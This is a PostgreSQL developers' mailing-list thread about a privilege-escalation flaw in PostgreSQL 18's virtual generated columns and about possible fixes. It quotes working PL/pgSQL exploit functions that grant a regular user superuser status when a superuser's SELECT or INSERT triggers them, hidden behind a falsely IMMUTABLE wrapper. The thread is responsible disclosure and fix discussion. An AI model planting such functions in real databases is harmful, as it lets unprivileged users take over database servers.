Thread: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Feike Steenbergen

Date:

23 May, 11:43:06

Hi,

While evaluating the PostgreSQL 18 beta, I had a thought experiment where I
thought it might be possible to use the new virtual generated columns to gain
superuser privileges for a regular user.

Attached is a sample exploit, that achieves this, key components:

- the GENERATED column uses a user defined immutable function
- this immutable function cannot ALTER ROLE (needs volatile)
- therefore this immutable function calls a volatile function
- the volatile function can contain any security exploit

The problem I think for PostgreSQL 18 is quite high, as I think it is more
likely that a superuser issues a `SELECT` against any table (graphical DB
clients for example, showing the first N rows in a window)

However, the problem *also* exists for the GENERATED [...] STORED columns, so
probably all pg versions >= 12? although it is less likely that a superuser
would `INSERT` into those tables?

Here's a transcript of the output of the file that shows it:

You are now connected to database "postgres" as user "regular". CREATE FUNCTION
CREATE FUNCTION CREATE TABLE INSERT 0 1 i | j ---+--- 1 | 1 (1 row)

You are now connected to database "postgres" as user "postgres". stage | case
-------------------------------+-------------- Before superuser did a SELECT |
regular user (1 row)

i | j
---+--- 1 | 1 (1 row)

stage | case
------------------------------+----------- After superuser did a SELECT |
superuser (1 row)

Forwarding this discussion from security@postgresql.org:

On Fri, 16 May 2025 at 23:12, Noah Misch <noah@leadboat.com> wrote:
>
> On Fri, May 16, 2025 at 07:16:13PM +0200, Feike Steenbergen wrote:
> > On Fri, 16 May 2025 at 19:00, Noah Misch <noah@leadboat.com> wrote:
> > > Thanks for the report. Does this attack work if the reader uses COPY
> > instead of SELECT? COPY has been safe, so we should think twice before
> > > making it unsafe.
> >
> > Plain COPY seems safe, that's a very good thing:
> >
> > -- This does not cause the regular user to become superuser COPY
> > exploit_generated.generated_sample TO STDOUT;
> >
> > -- This is safe, with a useful error: COPY
> > exploit_generated.generated_sample(i, j) TO STDOUT;
> >
> > ERROR: column "j" is a generated column DETAIL: Generated columns cannot be
> > used in COPY.
> >
> > Copy wrapped around a select however is not safe, (not a suprise I think):
> >
> > -- This is unsafe COPY (SELECT * FROM exploit_generated.generated_sample) TO
> > STDOUT;
>
> That suggests virtual generated table columns have the same risk as views, not
> more risk. That is good news.
>
> > > In other words, virtual generated columns make a table into a hybrid of
> > > view and table, so anything odd that we've needed to do to views and
> > foreign tables may apply to tables containing virtual generated columns.
> >
> > Yeah, that to me is the gist of the issue, that a plain `SELECT` against any
> > such table can be used to run arbitrary function calls.

On Fri, 16 May 2025 at 23:12, Noah Misch <noah@leadboat.com> wrote:
>
> If nothing else, I think the project will need to extend
> restrict_nonsystem_relation_kind so virtual generated columns become one of
> the things it can block.

Attachment

exploit_generated.sql

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

jian he

Date:

23 May, 15:47:34

On Fri, May 23, 2025 at 4:43 PM Feike Steenbergen
<feikesteenbergen@gmail.com> wrote:
>
>
> Hi,
>
> While evaluating the PostgreSQL 18 beta, I had a thought experiment where I
> thought it might be possible to use the new virtual generated columns to gain
> superuser privileges for a regular user.
>
> Attached is a sample exploit, that achieves this, key components:
>

hi.

excerpt from exploit_generated.sql
-----
CREATE FUNCTION exploit_generated.exploit_inner(i int)
RETURNS text
LANGUAGE plpgsql AS $fun$
BEGIN
    IF (select rolsuper from pg_catalog.pg_roles where
rolname=current_user) THEN
        ALTER USER regular WITH superuser;
    END IF;
    RETURN i::text;
END;
$fun$
VOLATILE;

CREATE FUNCTION exploit_generated.exploit(i int)
RETURNS text
LANGUAGE plpgsql AS $fun$
BEGIN
    RETURN exploit_generated.exploit_inner(i);
END;
$fun$
IMMUTABLE;

-----

when you mark it as IMMUTABLE, postgres think it's IMMUTABLE, but in this case
exploit_generated.exploit(i int) clearly is not an IMMUTABLE function.

Only IMMUTABLE functions are allowed in generated expressions,
but you can still misuse it by wrongly tagging the function as IMMUTABLE.

for example:
CREATE OR REPLACE FUNCTION exploit1(i int) RETURNS int LANGUAGE SQL IMMUTABLE
BEGIN ATOMIC
SELECT random(min=>1::int, max=>10);
END;
create table t1(a int, b int generated always as (exploit1(1)));

but
create table t3(a int, b int generated always as (random(min=>1::int,
max=>10)));
it will error out
ERROR:  generation expression is not immutable

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Feike Steenbergen

Date:

24 May, 09:38:50

On Fri, 23 May 2025 at 14:48, jian he <jian.universality@gmail.com> wrote:
> when you mark it as IMMUTABLE, postgres think it's IMMUTABLE, but in this case
> exploit_generated.exploit(i int) clearly is not an IMMUTABLE function.
>
> Only IMMUTABLE functions are allowed in generated expressions,
> but you can still misuse it by wrongly tagging the function as IMMUTABLE.

Yeah, I'm quite aware that the pattern used in the example isn't what one
*should* be doing. However, the problem with the exploit that it *could* be
done this way.

The loophole is this:

- the generated virtual column can use a user-defined function
- when running SELECT against that column by a superuser
the function is called within the context of a superuser
- this in turn allows the regular user to run any code within
the context of superuser

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

"David G. Johnston"

Date:

24 May, 17:00:22

On Saturday, May 24, 2025, jian he <jian.universality@gmail.com> wrote:

On Sat, May 24, 2025 at 2:39 PM Feike Steenbergen
<feikesteenbergen@gmail.com> wrote:
>
> The loophole is this:
>
> - the generated virtual column can use a user-defined function
> - when running SELECT against that column by a superuser
> the function is called within the context of a superuser
> - this in turn allows the regular user to run any code within
> the context of superuser

sorry, I am not fully sure what this means.
a minimum sql reproducer would be great.

This is same complaint being made against “security invoker” triggers existing/being the default. Or the general risk in higher privileged users running security invoker functions written by lesser privileged users.

The features conform to our existing security model design. Discussions are happening as pertains to that model and the OP should chime in there to contribute to the overall position of the project and not relegate the complaint to any one particular feature.

David J.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Robert Haas

Date:

29 May, 16:43:41

On Mon, May 26, 2025 at 10:52 AM Feike Steenbergen
<feikesteenbergen@gmail.com> wrote:
> On Mon, 26 May 2025 at 16:17, jian he <jian.universality@gmail.com> wrote:
> > calling exploit_generated.exploit by normal user or superuser the
> > effects are different,
> > that by definition is not IMMUTABLE.
>
> Yeah, i know this is *wrong* usage of IMMUTABLE, the point is that a rogue
> regular user *can* use this pattern to become superuser.

Before this discussion goes further in the wrong direction, I'd like
to say thanks to Feike for catching this issue before we ship the
feature. I'm not quite sure why some people are arguing with the
conclusion that there is a problem here: not only is there an exploit
script included in the original message, but there's also an included,
quoted discussion with the security team where Noah agrees that a
problem exists and that something will need to be done about it.

David is correct to point out that there are already a lot of ways
that a superuser can give away their privileges accidentally. In
particular, as Feike says, if a superuser performs DML on a
non-superuser owned table, it can fire a SECURITY INVOKER trigger
which, because the superuser is the invoker, will run as superuser and
can do anything, including confer superuser privileges on the author
of the trigger code. That is a pretty deplorable situation and we
should really, really do something about it, but we technically don't
classify it as a security vulnerability: we say that's user error on
the part of the superuser. But so far - apart from this feature - we
have managed to avoid making it categorically unsafe for the superuser
to run "SELECT * FROM table", which is a pretty good thing, because if
the superuser couldn't do at least that much, that would also imply,
for example, that there's no way to run a pg_dump without letting any
user on the system obtain superuser privileges. Point being: this
feature will need to be fixed in some way that avoids further
expanding the set of things that a superuser must not ever do for fear
of giving away their privileges accidentally, or else it will need to
be reverted. What we should be discussing here is whether to revert it
and, if not, how to fix it.

In making that decision, it might be a good idea to consider what else
is potentially problematic about this feature. I know of one other
issue, related to planning speed:

http://postgr.es/m/1514756.1747925490@sss.pgh.pa.us

In that email, Tom suggests that the appropriate fix might be to move
expansion to the rewriter, but I think that is probably not the right
solution, because 1e4351af329f2949c679a215f63c51d663ecd715 moved it
from the rewriter to the planner to fix various problems discussed on
the thread. But we should decide whether the resulting situation is
acceptable to ship.

To be clear, I like this feature in concept and I don't want it to
crash and burn. But I even more don't want to ship something and then
have a bunch of problems later that we can't really do anything about.

--
Robert Haas
EDB: http://www.enterprisedb.com

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

"David G. Johnston"

Date:

29 May, 17:43:32

On Thu, May 29, 2025 at 6:43 AM Robert Haas <robertmhaas@gmail.com> wrote:

Point being: this
feature will need to be fixed in some way that avoids further
expanding the set of things that a superuser must not ever do for fear
of giving away their privileges accidentally, or else it will need to
be reverted. What we should be discussing here is whether to revert it
and, if not, how to fix it.

Agreed. The fact we've extended now into the Select command is unacceptably enlarging the risk surface.

Just to make sure we are on the same page as to who IS supposed to be "current_user" within these functions - it should be the table owner, right?

We still need to obey "security definer" directives, yes?

This looks like a view...so can we quickly leverage whatever infrastructure is used to ensure views are evaluated under the view owner to ensure these generated expressions are evaluated as the table owner?

We are OK with the stored version existing as-is since re-evaluation doesn't happen on select; and both these and triggers already accept that we presently do not consider DML (aside from COPY which seems secured, at least within pg_dump/pg_restore, already) to be something we are going to help a superuser protect themself from performing safely?

David J.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Feike Steenbergen

Date:

29 May, 21:01:27

On Thu, 29 May 2025 at 15:43, Robert Haas <robertmhaas@gmail.com> wrote:
> that would also imply,
> for example, that there's no way to run a pg_dump without letting any
> user on the system obtain superuser privileges.

I checked, pg_dump seems safe, it doesn't extract the values, even when
using --column-inserts.

pg_restore may have issues though, as it will run these functions
for GENERATED STORED columns?

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Tom Lane

Date:

29 May, 21:15:22

Feike Steenbergen <feikesteenbergen@gmail.com> writes:
> pg_restore may have issues though, as it will run these functions
> for GENERATED STORED columns?

pg_restore is already fairly exposed, as it will run tables' CHECK
constraints, index expressions, etc.  I don't think GENERATED STORED
makes that picture much worse.

As Robert said upthread, it would be nice to make all this more
secure.  But it'd presumably involve user-visible semantics changes
along with the performance worries I mentioned.  It's a dauntingly
large task...

            regards, tom lane

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Matthias van de Meent

Date:

29 May, 21:24:03

On Thu, 29 May 2025 at 15:44, Robert Haas <robertmhaas@gmail.com> wrote:
> But so far - apart from this feature - we
> have managed to avoid making it categorically unsafe for the superuser
> to run "SELECT * FROM table"

With CREATE RULE [0], a table owner can redefine what happens during
e.g. SELECT * FROM table. This also includes outputting alternative
data sources, or e.g. calling a user-defined SECURITY INVOKER
function.

PG18 still seems to have support for CREATE RULE, so virtual generated
columns don't create a completely new security issue (blind SELECT *
FROM user_defined_table was already insecure) but rather a new threat
vector to this privilege escalation.

Kind regards,

Matthias van de Meent
Neon (https://neon.tech)

[0] https://www.postgresql.org/docs/18/sql-createrule.html

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Tom Lane

Date:

29 May, 21:30:29

Matthias van de Meent <boekewurm+postgres@gmail.com> writes:
> On Thu, 29 May 2025 at 15:44, Robert Haas <robertmhaas@gmail.com> wrote:
>> But so far - apart from this feature - we
>> have managed to avoid making it categorically unsafe for the superuser
>> to run "SELECT * FROM table"

> With CREATE RULE [0], a table owner can redefine what happens during
> e.g. SELECT * FROM table.

That's a view, not a table.  The distinction is critical in pg_dump,
and we also have restrict_nonsystem_relation_kind which can be used
to prevent accidental reads from views.  It would definitely be nice
to have a less hacky answer.  But making ordinary tables unsafe to
read absolutely is a quantum jump in insecurity; claiming otherwise
is not helpful.

            regards, tom lane

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Matthias van de Meent

Date:

29 May, 22:04:15

On Thu, 29 May 2025 at 20:30, Tom Lane <tgl@sss.pgh.pa.us> wrote:
>
> Matthias van de Meent <boekewurm+postgres@gmail.com> writes:
> > On Thu, 29 May 2025 at 15:44, Robert Haas <robertmhaas@gmail.com> wrote:
> >> But so far - apart from this feature - we
> >> have managed to avoid making it categorically unsafe for the superuser
> >> to run "SELECT * FROM table"
>
> > With CREATE RULE [0], a table owner can redefine what happens during
> > e.g. SELECT * FROM table.
>
> That's a view, not a table.

Ah, it's hidden deeper into the docs than I'd first read, but indeed
ON SELECT is only allowed for views. The syntax itself nor the 'event'
description in the parameters detail this restriction, which is where
I looked.

Sorry for the noise, and thank you for correcting me.

Kind regards,

Matthias van de Meent
Neon (https://neon.tech)

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Bruce Momjian

Date:

30 May, 02:32:01

On Thu, May 29, 2025 at 02:15:22PM -0400, Tom Lane wrote:
> Feike Steenbergen <feikesteenbergen@gmail.com> writes:
> > pg_restore may have issues though, as it will run these functions
> > for GENERATED STORED columns?
> 
> pg_restore is already fairly exposed, as it will run tables' CHECK
> constraints, index expressions, etc.  I don't think GENERATED STORED
> makes that picture much worse.
> 
> As Robert said upthread, it would be nice to make all this more
> secure.  But it'd presumably involve user-visible semantics changes
> along with the performance worries I mentioned.  It's a dauntingly
> large task...

I spent some time thinking about the above email.  First, this is on the
public hackers list, so it explains known security deficiencies.  Do we
document these somewhere?  I don't see them in the pg_dump or pg_restore
manual pages.

Second, I agree adding a SELECT security deficiency is certainly worse,
but how are we expecting people to restore databases securely with these
known deficiencies?

Effectively, what good is our security system if it is just delaying
someone from getting superuser privileges in case of a dump/restore?

(Yeah, that's me, Mr. Sunshine.  ;-) )

-- 
  Bruce Momjian  <bruce@momjian.us>        https://momjian.us
  EDB                                      https://enterprisedb.com

  Do not let urgent matters crowd out time for investment in the future.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Tom Lane

Date:

03 June, 04:19:20

Jeff Davis <pgsql@j-davis.com> writes:
> On Thu, 2025-05-29 at 11:12 -0400, Tom Lane wrote:
>> Perhaps a compromise is to invent RunAsUser but only apply it to
>> virtual columns for now, leaving the view case as a research
>> project.  Then we aren't destroying the performance of any
>> existing queries.

> Could we instead check that the expression is safe at the time the
> generated column is created?

Feels uncomfortably close to solving the halting problem.
Maybe we can make a conservative approximation that's good
enough to be useful, but I'm not certain.

> There are some details to work out. For instance, what happens if a
> function starts out as SECURITY DEFINER and then someone changes it
> later?

Yeah, TOCTOU loopholes would be a huge danger with anything
user-defined.  I'd kind of want to restrict it to built-in,
immutable functions (or maybe stable is enough, not sure).

We could reduce the TOCTOU window by making the decision as to
whether to wrap in RunAsUser at query rewrite/plan time instead
of table creation time.  But that would not close the window,
so I'm not sure how much it helps.

In any case, this doesn't feel like something to be defining and
implementing post-beta1.  Even if it were not security-critical,
the amount of complication involved is well past our standards
for what can go in post-feature-freeze.

I'm leaning more and more to the position that we ought to revert
virtual generated columns for v18 and give ourselves breathing
room to design a proper fix for the security hazard.

            regards, tom lane

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

jian he

Date:

03 June, 05:51:27

On Tue, Jun 3, 2025 at 9:19 AM Tom Lane <tgl@sss.pgh.pa.us> wrote:
>
> In any case, this doesn't feel like something to be defining and
> implementing post-beta1.  Even if it were not security-critical,
> the amount of complication involved is well past our standards
> for what can go in post-feature-freeze.
>
> I'm leaning more and more to the position that we ought to revert
> virtual generated columns for v18 and give ourselves breathing
> room to design a proper fix for the security hazard.
>

Do we consider INSERT associated with user defined function a security bug?  for
example, the following, INSERT with a check constraint.

CREATE OR REPLACE FUNCTION exploit_generated.exploit_inner(i int)
RETURNS text
LANGUAGE plpgsql AS $fun$
BEGIN
    IF (select rolsuper from pg_catalog.pg_roles where
rolname=current_user) THEN
        ALTER USER regular WITH superuser;
    END IF;
    RETURN i::text;
END;
$fun$
VOLATILE;

CREATE OR REPLACE FUNCTION exploit_generated.exploit(i int)
RETURNS text
LANGUAGE plpgsql AS $fun$
BEGIN
    RETURN exploit_generated.exploit_inner(i);
END;
$fun$
IMMUTABLE;

CREATE TABLE exploit_generated.t (i int, j text, constraint nn
check(exploit_generated.exploit(i) is not null));
INSERT INTO exploit_generated.t VALUES (1, '1');

If so, then it's a very old issue...

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Robert Haas

Date:

03 June, 15:58:58

On Mon, Jun 2, 2025 at 11:30 PM Tom Lane <tgl@sss.pgh.pa.us> wrote:
> > That being said I would like to see it corrected everywhere.
>
> Yeah, one approach we could take here is to try to move the goalposts
> for this whole topic, understanding that that will mean incompatible
> changes as well as some performance loss.  I'm not sure how many users
> would be happy to take that tradeoff, but some would.  Maybe two
> different operating modes would make it an easier sell?

I still believe that the answer here is some kind of function trust mechanism:

https://www.postgresql.org/message-id/flat/20180809190443.GA14011%40momjian.us#3dda365965c7d95007e58b7551161442
https://www.postgresql.org/message-id/CA%2BTgmoaHpmz9-7ybB17B2qpDoqsi7%3DOWigc-3VBctb6B_x8bKA%40mail.gmail.com
(pretty sure there's also a proposal from Noah, can't find the most
current version of it at the moment)

The problem with just up and changing the behavior is that it will
probably break some use cases (e.g. an ON INSERT/UPDATE trigger that
sets some column to current_user) and, worse still, it probably will
just result in a bunch of security holes in the opposite direction,
where the person inserting into the table is trying to hack the
account of the table owner rather than the other way around. Jeff
Davis has mentioned this hazard before: any time we switch user IDs to
execute code, there are possible attacks in BOTH directions. I haven't
seen a proposal other than function trust (in one of several proposed
variations) that can close all of those holes.

--
Robert Haas
EDB: http://www.enterprisedb.com

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Bruce Momjian

Date:

03 June, 17:11:28

On Tue, Jun  3, 2025 at 08:58:58AM -0400, Robert Haas wrote:
> On Mon, Jun 2, 2025 at 11:30 PM Tom Lane <tgl@sss.pgh.pa.us> wrote:
> > > That being said I would like to see it corrected everywhere.
> >
> > Yeah, one approach we could take here is to try to move the goalposts
> > for this whole topic, understanding that that will mean incompatible
> > changes as well as some performance loss.  I'm not sure how many users
> > would be happy to take that tradeoff, but some would.  Maybe two
> > different operating modes would make it an easier sell?
> 
> I still believe that the answer here is some kind of function trust mechanism:
> 
> https://www.postgresql.org/message-id/flat/20180809190443.GA14011%40momjian.us#3dda365965c7d95007e58b7551161442
> https://www.postgresql.org/message-id/CA%2BTgmoaHpmz9-7ybB17B2qpDoqsi7%3DOWigc-3VBctb6B_x8bKA%40mail.gmail.com
> (pretty sure there's also a proposal from Noah, can't find the most
> current version of it at the moment)
> 
> The problem with just up and changing the behavior is that it will
> probably break some use cases (e.g. an ON INSERT/UPDATE trigger that
> sets some column to current_user) and, worse still, it probably will
> just result in a bunch of security holes in the opposite direction,
> where the person inserting into the table is trying to hack the
> account of the table owner rather than the other way around. Jeff
> Davis has mentioned this hazard before: any time we switch user IDs to
> execute code, there are possible attacks in BOTH directions. I haven't
> seen a proposal other than function trust (in one of several proposed
> variations) that can close all of those holes.

I think the two cases are slightly different.  Our existing system has
users running triggers on tables that don't own as themselves, so the
table owner has full control over what is in the triggers.  If we were
to switch it so users run triggers as the table owner, the users can't
change the triggers --- they can only try to break the trigger by
changing the search path or something.

-- 
  Bruce Momjian  <bruce@momjian.us>        https://momjian.us
  EDB                                      https://enterprisedb.com

  Do not let urgent matters crowd out time for investment in the future.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Peter Eisentraut

Date:

05 June, 13:49:08

On 23.05.25 10:43, Feike Steenbergen wrote:
> Attached is a sample exploit, that achieves this, key components:
> 
> - the GENERATED column uses a user defined immutable function
> - this immutable function cannot ALTER ROLE (needs volatile)
> - therefore this immutable function calls a volatile function
> - the volatile function can contain any security exploit

I propose to address this by not allowing the use of user-defined 
functions in generation expressions for now.  The attached patch 
implements this.  This assumes that all built-in functions are 
trustworthy, for this purpose, which seems likely true and likely desirable.

I think the feature is still useful like that, and this approach 
provides a path to add new functionality in the future that grows this 
set of allowed functions, for example by allowing some configurable set 
of "trusted" functions or whatever.

Attachment

0001-Restrict-virtual-columns-to-use-built-in-functions.patch

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Pavel Stehule

Date:

05 June, 14:33:42

čt 5. 6. 2025 v 12:49 odesílatel Peter Eisentraut <peter@eisentraut.org> napsal:

On 23.05.25 10:43, Feike Steenbergen wrote:
> Attached is a sample exploit, that achieves this, key components:
>
> - the GENERATED column uses a user defined immutable function
> - this immutable function cannot ALTER ROLE (needs volatile)
> - therefore this immutable function calls a volatile function
> - the volatile function can contain any security exploit

I propose to address this by not allowing the use of user-defined
functions in generation expressions for now. The attached patch
implements this. This assumes that all built-in functions are
trustworthy, for this purpose, which seems likely true and likely desirable.

I think the feature is still useful like that, and this approach
provides a path to add new functionality in the future that grows this
set of allowed functions, for example by allowing some configurable set
of "trusted" functions or whatever.

Regards

Pavel

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Feike Steenbergen

Date:

05 June, 16:54:28

On Thu, 5 Jun 2025 at 12:49, Peter Eisentraut <peter@eisentraut.org> wrote:
> I propose to address this by not allowing the use of user-defined
> functions in generation expressions for now. The attached patch
> implements this. This assumes that all built-in functions are
> trustworthy, for this purpose, which seems likely true and likely desirable.
>
> I think the feature is still useful like that, and this approach
> provides a path to add new functionality in the future that grows this
> set of allowed functions, for example by allowing some configurable set
> of "trusted" functions or whatever.

+1

I really like this feature and it would be great if it gets into
pg18, even with some restrictions, thank you

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Robert Haas

Date:

05 June, 17:38:58

On Thu, Jun 5, 2025 at 6:49 AM Peter Eisentraut <peter@eisentraut.org> wrote:
> I propose to address this by not allowing the use of user-defined
> functions in generation expressions for now.  The attached patch
> implements this.  This assumes that all built-in functions are
> trustworthy, for this purpose, which seems likely true and likely desirable.
>
> I think the feature is still useful like that, and this approach
> provides a path to add new functionality in the future that grows this
> set of allowed functions, for example by allowing some configurable set
> of "trusted" functions or whatever.

I don't think this is sufficient to fix the problem. We have built-in
functions that are unsafe. These include LO functions like loread(),
lowrite(), lo_unlink(); functions that change session state like
set_config() and setseed(); functions that allow arbitrary query
execution like query_to_xml(); slot-manipulation functions like
pg_drop_replication_slot(); and maybe other things.

Even if it worked, I think it's an unappealing solution -- we've
worked really hard at extensibility and making decisions based on
object properties rather than what's built-in and what's provided by a
user or an extension. But I also don't think it works.

--
Robert Haas
EDB: http://www.enterprisedb.com

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

jian he

Date:

05 June, 18:18:11

On Thu, Jun 5, 2025 at 10:39 PM Robert Haas <robertmhaas@gmail.com> wrote:
>
> On Thu, Jun 5, 2025 at 6:49 AM Peter Eisentraut <peter@eisentraut.org> wrote:
> > I propose to address this by not allowing the use of user-defined
> > functions in generation expressions for now.  The attached patch
> > implements this.  This assumes that all built-in functions are
> > trustworthy, for this purpose, which seems likely true and likely desirable.
> >
> > I think the feature is still useful like that, and this approach
> > provides a path to add new functionality in the future that grows this
> > set of allowed functions, for example by allowing some configurable set
> > of "trusted" functions or whatever.
>
> I don't think this is sufficient to fix the problem. We have built-in
> functions that are unsafe. These include LO functions like loread(),
> lowrite(), lo_unlink(); functions that change session state like
> set_config() and setseed(); functions that allow arbitrary query
> execution like query_to_xml(); slot-manipulation functions like
> pg_drop_replication_slot(); and maybe other things.
>
> Even if it worked, I think it's an unappealing solution -- we've
> worked really hard at extensibility and making decisions based on
> object properties rather than what's built-in and what's provided by a
> user or an extension. But I also don't think it works.
>

I think it will work.
because we already require the generated column expression to be
immutable functions.

The above functions you mentioned are all not immutable.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Christoph Berg

Date:

05 June, 18:24:13

Re: Robert Haas
> I don't think this is sufficient to fix the problem. We have built-in
> functions that are unsafe. These include LO functions like loread(),
> lowrite(), lo_unlink(); functions that change session state like
> set_config() and setseed(); functions that allow arbitrary query
> execution like query_to_xml(); slot-manipulation functions like
> pg_drop_replication_slot(); and maybe other things.

That was my thought as well - if user defined functions are
disallowed, just put the exploit code into the expression.

Turns out that doesn't work:

=# create table pwn (id int, pwn boolean generated always as (pg_reload_conf()));
ERROR:  42P17: generation expression is not immutable

So the question is, are all built-in *immutable* functions safe?

Extending the idea, perhaps the check could be moved to run-time and
recursively check that only immutable functions are called, including
user-defined immutable functions?

Christoph

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Tom Lane

Date:

05 June, 18:46:08

Christoph Berg <myon@debian.org> writes:
> So the question is, are all built-in *immutable* functions safe?

Perhaps.

> Extending the idea, perhaps the check could be moved to run-time and
> recursively check that only immutable functions are called, including
> user-defined immutable functions?

I don't think I'd trust that.  UDFs can claim to be immutable but
be lying about it.

            regards, tom lane

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Christoph Berg

Date:

05 June, 19:03:51

Re: Tom Lane
> > Extending the idea, perhaps the check could be moved to run-time and
> > recursively check that only immutable functions are called, including
> > user-defined immutable functions?
> 
> I don't think I'd trust that.  UDFs can claim to be immutable but
> be lying about it.

That's why I said "recursively". Then truly immutable user-defined
functions could still be used.

But practically, people will probably want to select from other tables
anyway (I've already had to tell a customer that virtual columns do
not allow that), so the use-case for user immutable functions is
probably very thin.

Christoph

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Robert Haas

Date:

05 June, 22:15:53

On Thu, Jun 5, 2025 at 11:19 AM jian he <jian.universality@gmail.com> wrote:
> I think it will work.
> because we already require the generated column expression to be
> immutable functions.
>
> The above functions you mentioned are all not immutable.

Hmm. I guess I have no evidence that we have built-in immutable
functions that would cause a problem here. I still think it's a bad
direction to go.

--
Robert Haas
EDB: http://www.enterprisedb.com

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Amit Kapila

Date:

06 June, 09:13:01

On Thu, Jun 5, 2025 at 7:24 PM Feike Steenbergen
<feikesteenbergen@gmail.com> wrote:
>
> On Thu, 5 Jun 2025 at 12:49, Peter Eisentraut <peter@eisentraut.org> wrote:
> > I propose to address this by not allowing the use of user-defined
> > functions in generation expressions for now.  The attached patch
> > implements this.  This assumes that all built-in functions are
> > trustworthy, for this purpose, which seems likely true and likely desirable.
> >
> > I think the feature is still useful like that, and this approach
> > provides a path to add new functionality in the future that grows this
> > set of allowed functions, for example by allowing some configurable set
> > of "trusted" functions or whatever.
>
> +1
>
> I really like this feature and it would be great if it gets into
> pg18, even with some restrictions,
>

+1. I think even though the use of only builtins limits the usage of
this feature, it can still be useful for cases like String
manipulations (e.g., UPPER(name)), Date/time calculations (e.g.,
age(birthdate)), Mathematical transformations (e.g., price *
tax_rate), Computed timestamps (with use of date), JSON field
extraction, etc.

Allowing UDFs with some safety definition can be done in future releases.

--
With Regards,
Amit Kapila.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Peter Eisentraut

Date:

19 June, 00:11:39

On 05.06.25 12:49, Peter Eisentraut wrote:
> On 23.05.25 10:43, Feike Steenbergen wrote:
>> Attached is a sample exploit, that achieves this, key components:
>>
>> - the GENERATED column uses a user defined immutable function
>> - this immutable function cannot ALTER ROLE (needs volatile)
>> - therefore this immutable function calls a volatile function
>> - the volatile function can contain any security exploit
> 
> I propose to address this by not allowing the use of user-defined 
> functions in generation expressions for now.  The attached patch 
> implements this.  This assumes that all built-in functions are 
> trustworthy, for this purpose, which seems likely true and likely 
> desirable.
> 
> I think the feature is still useful like that, and this approach 
> provides a path to add new functionality in the future that grows this 
> set of allowed functions, for example by allowing some configurable set 
> of "trusted" functions or whatever.

Here is a new patch.

My previous patch was a bit too simple.  I had thought that 
check_functions_in_node() does the node walking itself, but that was 
wrong, so the patch only worked at the top-level of the expression.  So 
I had to build some node-walking scaffolding around it to make it work. 
Also, check_functions_in_node() has some comments about what node type 
it doesn't check, so I had to add some code to handle those.  This also 
requires that in addition to requiring built-in functions, we require 
built-in types.  This shouldn't move the needle, since non-builtin types 
can't do much without non-builtin functions.  Finally, it seems that 
most code actually uses FirstUnpinnedObjectId, not FirstNormalObjectId, 
to check for "built-in" status, so I changed to that, to be on the safe 
side.

Attachment

v1-0001-Restrict-virtual-columns-to-use-built-in-function.patch

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

jian he

Date:

21 June, 08:29:40

On Thu, Jun 19, 2025 at 5:11 AM Peter Eisentraut <peter@eisentraut.org> wrote:
> Here is a new patch.
>
> My previous patch was a bit too simple.  I had thought that
> check_functions_in_node() does the node walking itself, but that was
> wrong, so the patch only worked at the top-level of the expression.  So
> I had to build some node-walking scaffolding around it to make it work.
> Also, check_functions_in_node() has some comments about what node type
> it doesn't check, so I had to add some code to handle those.  This also
> requires that in addition to requiring built-in functions, we require
> built-in types.  This shouldn't move the needle, since non-builtin types
> can't do much without non-builtin functions.  Finally, it seems that
> most code actually uses FirstUnpinnedObjectId, not FirstNormalObjectId,
> to check for "built-in" status, so I changed to that, to be on the safe
> side.

+ /*
+ * check_functions_in_node() doesn't check some node types (see
+ * comment there).  We handle CoerceToDomain and MinMaxExpr by
+ * checking for built-in types.  The other listed node types cannot
+ * call user-definable SQL-visible functions.
+ *
+ * We furthermore need this type check to handle built-in, immutable
+ * polymorphic functions such as array_eq().
+ */
+ if (exprType(node) >= FirstUnpinnedObjectId)
+ ereport(ERROR,
+ errcode(ERRCODE_FEATURE_NOT_SUPPORTED),
+ errmsg("generation expression uses user-defined type"),
+ errdetail("Virtual generated columns that make use of user-defined
types are not yet supported."),
+ parser_errposition(pstate, exprLocation(node)));
this part  doesn't have tests. we can have some tests based on in
src/test/regress/sql/create_type.sql
then I found an strange case:
( the following excerpted from create_type.sql)

BEGIN;
CREATE TYPE int42;
-- Make dummy I/O routines using the existing internal support for int4, text
CREATE FUNCTION int42_in(cstring)
   RETURNS int42
   AS 'int4in'
   LANGUAGE internal STRICT IMMUTABLE;
CREATE FUNCTION int42_out(int42)
   RETURNS cstring
   AS 'int4out'
   LANGUAGE internal STRICT IMMUTABLE;
CREATE TYPE int42 (
   internallength = 4,
   input = int42_in,
   output = int42_out,
   alignment = int4,
   default = 42,
   passedbyvalue
);
COMMIT;


CREATE TABLE gtest1 (a int42 GENERATED ALWAYS AS ('1') VIRTUAL);
CREATE TABLE gtest2 (a int42 GENERATED ALWAYS AS ('1'::int42) VIRTUAL);
ERROR:  generation expression uses user-defined type
